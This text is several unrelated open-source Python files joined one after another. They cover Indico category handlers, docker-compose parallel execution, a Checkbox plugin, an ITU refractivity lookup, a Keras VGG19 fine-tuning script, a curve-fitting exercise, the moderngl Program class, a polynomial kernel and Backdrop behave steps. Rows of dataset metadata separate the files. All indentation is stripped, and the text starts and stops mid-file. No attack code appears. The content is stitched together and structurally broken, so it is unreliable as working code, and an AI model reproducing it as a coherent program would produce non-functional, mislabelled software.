self._confs = selConfs
def perform(self, confs):
for event in confs:
event.delete()
def askConfirmation(self, params):
p = category.WPConferenceDeletion(self._rh, self._target)
return p.display(events=self._confs)
class _ActionConferenceReallocation:
def __init__( self, rh, srcCateg, selConfs, target):
self._rh = rh
self._categ = srcCateg
self._confs = selConfs
self._target=target
def askConfirmation( self, params ):
p = category.WPConferenceReallocation( self._rh, self._categ )
params["confs"] = self._confs
return p.display( **params )
def perform(self, confs):
# TODO: check if the current user can create conferences on the destination category
if not self._confs:
self._confs = confs
for conf in self._confs:
if self._categ == conf.getOwner():
self._categ.moveConference(conf, self._target)
class RHCategoryActionConferences(RHCategModifBase):
_uh = urlHandlers.UHCategoryActionConferences
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
confIdList = self._normaliseListParam(params.get("selectedConf", []))
self._confs = []
self._confirmation = params.has_key("confirm")
if "cancel" in params:
return
ch = conference.ConferenceHolder()
for confId in confIdList:
self._confs.append( ch.getById( confId ) )
self._action = _ActionConferenceDeletion( self, self._target, self._confs, )
if params.has_key("reallocate"):
self._srcCateg = self._target
if self._confirmation:
cm = conference.CategoryManager()
self._srcCateg = cm.getById( params["srcCategId"] )
self._action = _ActionConferenceReallocation( self, self._srcCateg, self._confs, self._target )
def _process( self ):
if self._confirmation:
self._action.perform(self._confs)
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
if not self._confs:
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
else:
return self._action.askConfirmation( self._getRequestParams() )
class RHCategorySetVisibility( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetVisibility
def _process( self ):
params = self._getRequestParams()
if params.has_key("changeToPrivate"):
self._target.setProtection( 1 )
elif params.has_key("changeToInheriting"):
self._target.setProtection( 0 )
elif params.has_key("changeToPublic"):
# The 'Home' category is handled as a special case.
# We maintain the illusion for the user of it being either
# private or public, but actually it can be either private
# or inheriting for legacy reasons.
if params["type"] == "Home":
self._target.setProtection( 0 )
else :
self._target.setProtection( -1 )
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategorySetConfControl( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetConfCreationControl
def _process( self ):
params = self._getRequestParams()
if "RESTRICT" in self._getRequestParams():
self._target.restrictConferenceCreation()
else:
self._target.allowConferenceCreation()
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategorySetNotifyCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategorySetNotifyCreation
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
self._emailList = params.get("notifyCreationList","")
if self._emailList.strip() != "" and not validMail(self._emailList):
raise FormValuesError(_("The email list contains invalid e-mail addresses or invalid separator"))
def _process( self ):
self._target.setNotifyCreationList(self._emailList)
self._redirect( urlHandlers.UHCategModifAC.getURL( self._target ) )
class RHCategoryDeletion(RHCategModifBase):
_uh = urlHandlers.UHCategoryDeletion
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
self._cancel = False
if "cancel" in params:
self._cancel = True
self._confirmation = params.has_key("confirm")
def _perform( self ):
self._target.delete(1)
def _process( self ):
if self._cancel:
self._redirect( urlHandlers.UHCategModifTools.getURL( self._target ) )
elif self._confirmation:
owner = self._target.getOwner()
self._perform()
self._redirect(urlHandlers.UHCategoryModification.getURL(owner))
else:
p = category.WPCategoryDeletion(self, self._target)
return p.display()
| gpl-3.0 | -1,614,652,444,537,777,400 | 36.004386 | 167 | 0.627 | false |
funkyfuture/docker-compose | compose/parallel.py | 1 | 10546 | from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import operator
import sys
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from six.moves import _thread as thread
from six.moves.queue import Empty
from six.moves.queue import Queue
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
from compose.utils import get_output_stream
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit(object):
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
def parallel_execute_watch(events, writer, errors, results, msg, get_name):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
"""
objects = list(objects)
stream = get_output_stream(sys.stderr)
if ParallelStreamWriter.instance:
writer = ParallelStreamWriter.instance
else:
writer = ParallelStreamWriter(stream)
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(events, writer, errors, results, msg, get_name)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
def _no_deps(x):
return []
class State(object):
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit(object):
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
class ParallelStreamWriter(object):
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
noansi = False
lock = Lock()
instance = None
@classmethod
def set_noansi(cls, value=True):
cls.noansi = value
def __init__(self, stream):
self.stream = stream
self.lines = []
self.width = 0
ParallelStreamWriter.instance = self
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
self.stream.write("{:<{width}} ... \r\n".format(
msg + ' ' + obj_index, width=self.width))
self.stream.flush()
def _write_ansi(self, msg, obj_index, status):
self.lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write("{:<{width}} ... {}\r\n".format(msg + ' ' + obj_index,
status, width=self.width))
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.noansi:
self._write_noansi(msg, obj_index, status)
else:
self._write_ansi(msg, obj_index, color_func(status))
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
| apache-2.0 | -6,830,198,598,084,363,000 | 30.201183 | 103 | 0.626399 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/checkbox/plugins/remote_suite.py | 1 | 1664 | #
# This file is part of Checkbox.
#
# Copyright 2008 Canonical Ltd.
#
# Checkbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Checkbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Checkbox. If not, see <http://www.gnu.org/licenses/>.
#
from checkbox.plugin import Plugin
class RemoteSuite(Plugin):
def register(self, manager):
super(RemoteSuite, self).register(manager)
for (rt, rh) in [
("prompt-remote", self.prompt_remote),
("report-remote", self.report_remote)]:
self._manager.reactor.call_on(rt, rh)
def prompt_remote(self, interface, suite):
self._manager.reactor.fire("prompt-suite", interface, suite)
# Register temporary handler for report-message events
def report_message(message):
message["suite"] = suite["name"]
self._manager.reactor.fire("report-job", message)
event_id = self._manager.reactor.call_on("report-message", report_message)
self._manager.reactor.fire("message-exec", suite)
self._manager.reactor.cancel_call(event_id)
def report_remote(self, suite):
self._manager.reactor.fire("report-suite", suite)
factory = RemoteSuite
| gpl-3.0 | 1,768,032,259,811,580,400 | 33.666667 | 82 | 0.688702 | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/reference_models/geo/refractivity.py | 1 | 3789 | # Copyright 2017 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Returns the ITU surface refractivity for a specified lat/lon.
Standalone execution:
python refractivity.py lat lng
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import math
import os
import sys
import numpy as np
from reference_models.geo import CONFIG
class RefractivityIndexer:
"""RefractivityIndexer class to retrieve refractivity for given world location.
It retrieves the nearest four refractivity points from ITU data file with
1.5 degree grid, and interpolates bilinearly between those points.
Typical usage:
refractor = RefractivityIndexer()
r = refractor.Refractivity(19.66, -155.55)
"""
def __init__(self, datafile_or_dir=None):
self.ConfigureDataFile(datafile_or_dir, do_load=False)
self._num_lat_rows = 121 # Number of latitude rows in the data file
self._num_lon_cols = 241 # Number of longitude columns in the data file
self._lat_start = 90.0 # Latitude corresponding to first row of file (deg)
self._lon_start = 0.0 # Longitude corresponding to first column of file (deg)
self._delta_lat = self._delta_lon = 1.5 # Spacing between lat/lon rows/columns (deg)
def ConfigureDataFile(self, datafile_or_dir, do_load=True):
"""Configure the refractivity data file.
Inputs:
datafile_or_dir: the data path or directory.
If directory, then the datafile is the standard 'n050.txt'.
If None, then use the standard database location from CONFIG.py.
do_load: if set (default), load the data, otherwise do lazy loading.
"""
self._datafile = datafile_or_dir
if self._datafile is None:
self._datafile = os.path.join(CONFIG.GetItuDir(), 'n050.txt')
elif os.path.isdir(self._datafile):
self._datafile = os.path.join(self._datafile, 'n050.txt')
self._data = None
if do_load:
self._data = np.loadtxt(self._datafile)
def Refractivity(self, lat, lon):
"""Returns ITU refractivity for the specified lat/lon.
Inputs:
lat, lon : the coordinates of a point.
Returns:
the sea level refractivity on that point.
"""
if self._data is None:
self._data = np.loadtxt(self._datafile)
logging.info('Loaded refractivity data from %s' % self._datafile)
if lon < 0:
lon = lon + 360.0
row = (self._lat_start - lat) / self._delta_lat
col = (lon - self._lon_start) / self._delta_lon
# Bilinear interpolation on values
irow = int(math.floor(row))
icol = int(math.floor(col))
r00 = self._data[irow, icol]
r11 = self._data[irow+1, icol+1]
r01 = self._data[irow, icol+1]
r10 = self._data[irow+1, icol]
alpha_r, alpha_c = row - irow, col - icol
refractivity = ( r11 * alpha_r * alpha_c +
r00 * (1-alpha_r) * (1-alpha_c) +
r01 * (1-alpha_r) * alpha_c +
r10 * alpha_r * (1-alpha_c) )
return refractivity
if __name__ == '__main__':
indx = RefractivityIndexer()
r = indx.Refractivity(float(sys.argv[1]), float(sys.argv[2]))
print('Surface Refractivity (n-units) = %s' % r)
| apache-2.0 | -7,794,711,748,730,794,000 | 33.445455 | 89 | 0.666139 | false |
whoisever/vgg16_finetune_mutli_label | vgg19.py | 1 | 4374 | # -*- coding: utf-8 -*-
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from sklearn.metrics import log_loss
from load_cifar10 import load_cifar10_data
def vgg19_model(img_rows, img_cols, channel=1, num_classes=None):
"""
VGG 19 Model for Keras
Model Schema is based on
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
ImageNet Pretrained Weights
https://drive.google.com/file/d/0Bz7KyqmuGsilZ2RVeVhKY0FyRmc/view?usp=sharing
Parameters:
img_rows, img_cols - resolution of inputs
channel - 1 for grayscale, 3 for color
num_classes - number of class labels for our classification task
"""
model = Sequential()
model.add(ZeroPadding2D((1,1),input_shape=(channel, img_rows, img_cols)))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(128, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(128, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(256, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
# Add Fully Connected Layer
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1000, activation='softmax'))
# Loads ImageNet pre-trained data
model.load_weights('imagenet_models/vgg19_weights.h5')
# Truncate and replace softmax layer for transfer learning
model.layers.pop()
model.outputs = [model.layers[-1].output]
model.layers[-1].outbound_nodes = []
model.add(Dense(num_classes, activation='softmax'))
# Learning rate is changed to 0.001
sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
if __name__ == '__main__':
# Example to fine-tune on 3000 samples from Cifar10
img_rows, img_cols = 224, 224 # Resolution of inputs
channel = 3
num_classes = 10
batch_size = 16
nb_epoch = 10
# Load Cifar10 data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid = load_cifar10_data(img_rows, img_cols)
# Load our model
model = vgg19_model(img_rows, img_cols, channel, num_classes)
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_data=(X_valid, Y_valid),
)
# Make predictions
predictions_valid = model.predict(X_valid, batch_size=batch_size, verbose=1)
# Cross-entropy loss score
score = log_loss(Y_valid, predictions_valid)
| mit | -7,142,099,060,226,937,000 | 34.274194 | 145 | 0.665066 | false |
dvida/UWO-PA-Python-Course | Lecture 6/Task 1/L6_T1_solution.py | 1 | 1086 | from __future__ import print_function
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
from TextFileParser import parseTextFile
def meteor_model(x, a, b, c, d):
""" Time vs. meteor lag. """
return a*np.exp(b*x) + c*x + d
if __name__ == "__main__":
# File name of the data file
file_name = 'meteor_data.txt'
# Load the data
star_data = parseTextFile(file_name, header=1)
# Convert to float numpy array
star_data = np.array(star_data, dtype=np.float64)
# Extract x and y data
x = star_data[:,0]
y = star_data[:,1]
# Fit the model
popt, pconv = scipy.optimize.curve_fit(meteor_model, x, y)
print(popt)
# Plot original data
plt.scatter(x, y)
# Generate new X data (original data is not sorted and not well distributed)
x_plot = np.linspace(x.min(), x.max(), 100)
# Plot fitted model
plt.plot(x_plot, meteor_model(x_plot, *popt))
plt.show()
# Calculate residuals
res = y - meteor_model(x, *popt)
plt.scatter(x, res)
plt.grid()
plt.show() | mit | 550,034,698,031,318,200 | 18.763636 | 80 | 0.617864 | false |
cprogrammer1994/ModernGL | moderngl/program.py | 1 | 7352 | from typing import Tuple, Union, Generator
from .program_members import (Attribute, Subroutine, Uniform, UniformBlock,
Varying)
__all__ = ['Program', 'detect_format']
class Program:
'''
A Program object represents fully processed executable code
in the OpenGL Shading Language, for one or more Shader stages.
In ModernGL, a Program object can be assigned to :py:class:`VertexArray` objects.
The VertexArray object is capable of binding the Program object once the
:py:meth:`VertexArray.render` or :py:meth:`VertexArray.transform` is called.
Program objects has no method called ``use()``, VertexArrays encapsulate this mechanism.
A Program object cannot be instantiated directly, it requires a context.
Use :py:meth:`Context.program` to create one.
Uniform buffers can be bound using :py:meth:`Buffer.bind_to_uniform_block`
or can be set individually. For more complex binding yielding higher
performance consider using :py:class:`moderngl.Scope`.
'''
__slots__ = ['mglo', '_members', '_subroutines', '_geom', '_glo', 'ctx', 'extra']
def __init__(self):
self.mglo = None #: Internal representation for debug purposes only.
self._members = {}
self._subroutines = None
self._geom = (None, None, None)
self._glo = None
self.ctx = None #: The context this object belongs to
self.extra = None #: Any - Attribute for storing user defined objects
raise TypeError()
def __repr__(self):
return '<Program: %d>' % self._glo
def __eq__(self, other) -> bool:
"""Compares two programs opengl names (mglo).
Returns:
bool: If the programs have the same opengl name
Example::
# True if the internal opengl name is the same
program_1 == program_2
"""
return type(self) is type(other) and self.mglo is other.mglo
def __getitem__(self, key) -> Union[Uniform, UniformBlock, Subroutine, Attribute, Varying]:
"""Get a member such as uniforms, uniform blocks, subroutines,
attributes and varyings by name.
.. code-block:: python
# Get a uniform
uniform = program['color']
# Uniform values can be set on the returned object
# or the `__setitem__` shortcut can be used.
program['color'].value = 1.0, 1.0, 1.0, 1.0
# Still when writing byte data we need to use the `write()` method
program['color'].write(buffer)
"""
return self._members[key]
def __setitem__(self, key, value):
"""Set a value of uniform or uniform block
.. code-block:: python
# Set a vec4 uniform
uniform['color'] = 1.0, 1.0, 1.0, 1.0
# Optionally we can store references to a member and set the value directly
uniform = program['color']
uniform.value = 1.0, 0.0, 0.0, 0.0
uniform = program['cameraMatrix']
uniform.write(camera_matrix)
"""
self._members[key].value = value
def __iter__(self) -> Generator[str, None, None]:
"""Yields the internal members names as strings.
This includes all members such as uniforms, attributes etc.
Example::
# Print member information
for name in program:
member = program[name]
print(name, type(member), member)
Output::
vert <class 'moderngl.program_members.attribute.Attribute'> <Attribute: 0>
vert_color <class 'moderngl.program_members.attribute.Attribute'> <Attribute: 1>
gl_InstanceID <class 'moderngl.program_members.attribute.Attribute'> <Attribute: -1>
rotation <class 'moderngl.program_members.uniform.Uniform'> <Uniform: 0>
scale <class 'moderngl.program_members.uniform.Uniform'> <Uniform: 1>
We can filter on member type if needed::
for name in prog:
member = prog[name]
if isinstance(member, moderngl.Uniform):
print("Uniform", name, member)
or a less verbose version using dict comprehensions::
uniforms = {name: self.prog[name] for name in self.prog
if isinstance(self.prog[name], moderngl.Uniform)}
print(uniforms)
Output::
{'rotation': <Uniform: 0>, 'scale': <Uniform: 1>}
"""
yield from self._members
@property
def geometry_input(self) -> int:
'''
int: The geometry input primitive.
The GeometryShader's input primitive if the GeometryShader exists.
The geometry input primitive will be used for validation.
'''
return self._geom[0]
@property
def geometry_output(self) -> int:
'''
int: The geometry output primitive.
The GeometryShader's output primitive if the GeometryShader exists.
'''
return self._geom[1]
@property
def geometry_vertices(self) -> int:
'''
int: The maximum number of vertices that
the geometry shader will output.
'''
return self._geom[2]
@property
def subroutines(self) -> Tuple[str, ...]:
'''
tuple: The subroutine uniforms.
'''
return self._subroutines
@property
def glo(self) -> int:
'''
int: The internal OpenGL object.
This values is provided for debug purposes only.
'''
return self._glo
def get(self, key, default) -> Union[Uniform, UniformBlock, Subroutine, Attribute, Varying]:
'''
Returns a Uniform, UniformBlock, Subroutine, Attribute or Varying.
Args:
default: This is the value to be returned in case key does not exist.
Returns:
:py:class:`Uniform`, :py:class:`UniformBlock`, :py:class:`Subroutine`,
:py:class:`Attribute` or :py:class:`Varying`
'''
return self._members.get(key, default)
def release(self) -> None:
'''
Release the ModernGL object.
'''
self.mglo.release()
def detect_format(program, attributes, mode='mgl') -> str:
'''
Detect format for vertex attributes.
The format returned does not contain padding.
Args:
program (Program): The program.
attributes (list): A list of attribute names.
Returns:
str
'''
def fmt(attr):
'''
For internal use only.
'''
# Translate shape format into attribute format
mgl_fmt = {
'd': 'f8',
'I': 'u'
}
# moderngl attribute format uses f, i and u
if mode == 'mgl':
return attr.array_length * attr.dimension, mgl_fmt.get(attr.shape) or attr.shape
# struct attribute format uses f, d, i and I
elif mode == 'struct':
return attr.array_length * attr.dimension, attr.shape
else:
raise ValueError('invalid format mode: {}'.format(mode))
return ' '.join('%d%s' % fmt(program[a]) for a in attributes)
| mit | -7,031,265,398,693,830,000 | 31.104803 | 96 | 0.575218 | false |
charanpald/sandbox | sandbox/kernel/PolyKernel.py | 1 | 1730 |
import numpy
from sandbox.kernel.AbstractKernel import AbstractKernel
from sandbox.util.Parameter import Parameter
class PolyKernel(AbstractKernel):
"""
A class to find polynomial kernel evaluations k(x, y) = (<x, y> + b)^degree
"""
def __init__(self, b=1.0, degree=2):
"""
Initialise object with given value of b >= 0 and degree
:param b: kernel bias parameter.
:type b: :class:`float`
:param degree: degree parameter.
:type degree: :class:`int`
"""
self.setB(b)
self.setDegree(degree)
def evaluate(self, X1, X2):
"""
Find kernel evaluation between two matrices X1 and X2 whose rows are
examples and have an identical number of columns.
:param X1: First set of examples.
:type X1: :class:`numpy.ndarray`
:param X2: Second set of examples.
:type X2: :class:`numpy.ndarray`
"""
Parameter.checkClass(X1, numpy.ndarray)
Parameter.checkClass(X2, numpy.ndarray)
if X1.shape[1] != X2.shape[1]:
raise ValueError("Invalid matrix dimentions: " + str(X1.shape) + " " + str(X2.shape))
K = (numpy.dot(X1, X2.T) + self.b)**self.degree
return K
def setB(self, b):
"""
Set the b parameter.
:param b: kernel bias parameter.
:type b: :class:`float`
"""
Parameter.checkFloat(b, 0.0, float('inf'))
self.b = b
def setDegree(self, degree):
"""
Set the degree parameter.
:param degree: kernel degree parameter.
:type degree: :class:`int`
"""
Parameter.checkInt(degree, 1, float('inf'))
self.degree = degree | gpl-3.0 | 6,772,952,362,683,971,000 | 25.227273 | 97 | 0.574566 | false |
alphagov/backdrop | features/steps/read_api.py | 1 | 8202 | import datetime
import os
import re
from behave import given, when, then, step_matcher
from dateutil import parser
from flask import json
from hamcrest import assert_that, is_, is_not, matches_regexp, has_length, equal_to, \
has_item, has_entries, has_entry
import pytz
from features.support.api_common import ensure_data_set_exists
from features.support.stagecraft import create_or_update_stagecraft_service
FIXTURE_PATH = os.path.join(os.path.dirname(__file__), '..', 'fixtures')
TEST_STAGECRAFT_PORT = 3103
@given('the api is running in protected mode')
def step(context):
context.client.set_config_parameter('PREVENT_RAW_QUERIES', True)
@given('"{fixture_name}" is in "{data_set_name}" data_set')
def step(context, fixture_name, data_set_name):
ensure_data_set_exists(context, data_set_name)
fixture_path = os.path.join(FIXTURE_PATH, fixture_name)
with open(fixture_path) as fixture:
for obj in json.load(fixture):
for key in ['_timestamp', '_day_start_at',
'_week_start_at', '_month_start_at']:
if key in obj:
obj[key] = parser.parse(obj[key]).astimezone(pytz.utc)
context.client.storage().save_record(data_set_name, obj)
def get_data_set_settings_from_context_table(table):
def to_py(string_in):
if string_in == "None":
return None
else:
return json.loads(string_in)
return {row['key']: to_py(row['value']) for row in table}
@given('"{fixture_name}" is in "{data_set_name}" data_set with settings')
def step(context, fixture_name, data_set_name):
settings = get_data_set_settings_from_context_table(context.table)
ensure_data_set_exists(context, data_set_name, settings)
fixture_path = os.path.join(FIXTURE_PATH, fixture_name)
with open(fixture_path) as fixture:
for obj in json.load(fixture):
for key in ['_timestamp', '_day_start_at',
'_week_start_at', '_month_start_at']:
if key in obj:
obj[key] = parser.parse(obj[key]).astimezone(pytz.utc)
context.client.storage().save_record(data_set_name, obj)
@given('I have a record updated "{timespan}" ago in the "{data_set_name}" data_set')
def step(context, timespan, data_set_name):
now = datetime.datetime.utcnow()
number_of_seconds = int(re.match(r'^(\d+) seconds?', timespan).group(1))
timedelta = datetime.timedelta(seconds=number_of_seconds)
updated = now - timedelta
record = {
"_updated_at": updated
}
context.client.storage().save_record(data_set_name, record)
@given('I have a data_set named "{data_set_name}" with settings')
def step(context, data_set_name):
settings = get_data_set_settings_from_context_table(context.table)
ensure_data_set_exists(context, data_set_name, settings)
@given('Stagecraft is running')
def step(context):
create_or_update_stagecraft_service(context, TEST_STAGECRAFT_PORT, {})
@when('I go to "{query}"')
def step(context, query):
context.response = context.client.get(query)
@when('I send another request to "{query}" with the received etag')
def step(context, query):
etag = context.response.headers["ETag"]
context.response = context.client.get(query,
headers={"If-None-Match": etag})
def get_error_message(response_data):
message = ""
try:
message = json.loads(response_data).get('message', "")
except:
pass
return message
@then('I should get back a status of "{expected_status}"')
def step(context, expected_status):
assert_that(context.response.status_code, is_(int(expected_status)),
get_error_message(context.response.data))
@then('I should get a "{header}" header of "{value}"')
def step(context, header, value):
assert_that(context.response.headers.get(header), is_(value))
@then('I should get back the message "{message}"')
def step(context, message):
data = json.loads(context.response.data)
assert_that(data["message"], is_(message))
@then('I should get back the status of "{expected_status}"')
def step(context, expected_status):
data = json.loads(context.response.data)
assert_that(data["status"], is_(expected_status))
@then('I should get back the parse error "{parse_error}"')
def step(context, parse_error):
data = json.loads(context.response.data)
assert_that(data["message"], matches_regexp(parse_error))
@then('I should get back a message: "{expected_message}"')
def step(context, expected_message):
assert_that(
json.loads(context.response.data),
is_(json.loads(expected_message)))
@then(u'I should get back a warning of "{expected_warning}"')
def step(context, expected_warning):
